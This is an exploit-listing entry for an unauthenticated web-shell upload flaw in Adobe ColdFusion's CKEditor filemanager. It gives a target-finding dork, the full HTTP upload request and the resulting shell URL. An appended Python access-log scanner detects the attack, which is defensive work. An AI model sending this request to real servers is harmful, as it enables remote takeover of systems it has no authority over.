# Exploit Title: Unrestricted file upload in Adobe ColdFusion
# Google Dork: ext:cfm
# Date: --
# Exploit Author: Pete Freitag of Foundeo
# Reversed: Vahagn vah_13 Vardanian
# Vendor Homepage: adobe.com
# Version:
# Tested on: Adobe ColdFusion
# CVE : CVE--
# Comment: September , : Updates for ColdFusion and ColdFusion have been elevated to Priority due to a report that CVE-- is now being actively exploited.

```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: coldfusion:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length:
Connection: close
Upgrade-Insecure-Requests:

-----------------------------
Content-Disposition: form-data; name="file"; filename="shell_file"
Content-Type: image/jpeg

%shell code here%
-----------------------------
Content-Disposition: form-data; name="path"

shell
-------------------------------
```

A shell will be located here: http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file
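
A defender-side check for the request above, as an added example that is not part of the original advisory: it scans web-server access logs for POSTs to the `upload.cfm` endpoint and for later requests under `uploadedFiles/`, escalating when the same client did both. Combined Log Format, case-insensitive path matching, the function names, the severity labels and the sample log lines are all assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the request and result URL on this page.
BASE = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/"
UPLOAD = (BASE + "upload.cfm").lower()
STORE = (BASE + "uploadedFiles/").lower()

# Combined Log Format (assumed): ip - user [time] "METHOD path PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def normalise(raw_path):
    """Drop query string and ;params, decode %xx, collapse //, lower-case."""
    path = unquote(raw_path.split("?", 1)[0]).split(";", 1)[0]
    return re.sub(r"/+", "/", path).lower()

def scan(lines):
    """Return (severity, client, time, reason) tuples in log order."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, when, method, raw, status = m.groups()
        path, ok = normalise(raw), status.startswith("2")
        if path == UPLOAD and method == "POST":
            if ok:
                uploaders.add(ip)  # remember clients whose upload succeeded
            findings.append(("high" if ok else "info", ip, when,
                             f"POST to filemanager upload.cfm ({status})"))
        elif path.startswith(STORE) and len(path) > len(STORE):
            # Escalate when the same client uploaded first and the file exists.
            sev = "critical" if ok and ip in uploaders else "medium"
            findings.append((sev, ip, when,
                             f"request for uploaded file {path[len(STORE):]!r} ({status})"))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.cfm HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "POST ' + BASE + 'upload.cfm HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET ' + BASE.upper() + 'uploadedFiles/shell_file HTTP/1.1" 200 9 "-" "-"',
    '192.0.2.44 - - [01/Jan/2024:11:30:00 +0000] "POST ' + BASE + 'upload.cfm HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.44 - - [01/Jan/2024:11:30:02 +0000] "GET ' + BASE + 'uploadedFiles/x HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(" | ".join(finding))
```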
